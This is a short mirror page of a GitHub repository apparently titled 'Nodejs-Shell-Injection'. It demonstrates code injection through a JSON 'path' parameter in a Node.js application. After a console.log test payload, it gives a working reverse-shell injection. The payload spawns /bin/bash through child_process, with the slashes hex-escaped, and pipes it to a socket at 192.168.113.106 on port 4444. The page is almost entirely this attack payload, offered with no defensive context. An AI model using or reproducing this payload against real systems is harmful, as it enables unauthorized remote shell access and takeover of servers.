Giters

enderphan94 / Nodejs-Shell-Injection

#nodejs #reverse_shell

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Nodejs-Shell-Injection

Concept:

Vulnerable Json Parameters

{
"requests":
  [
    {
    "method":"get","path":"/profile;<injected payload>"
      }
  ]
}

Pre-investigation with BurpSuite

{
"requests":
  [
    {
    "method":"get","path":"/profile;console.log('INJECTED PAYLOAD');"
      }
  ]
}

Inject Reverse Nodejs Shell

{
"requests":
  [
    {
    "method":"get","path":"/profile;var net = require('net'),sh = require('child_process').exec('\\x2fbin\\x2fbash'); var client = new net.Socket();client.connect(4444, '192.168.113.106', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"
      }
  ]
}

About

#nodejs #reverse_shell

Languages

Language:JavaScript 100.0%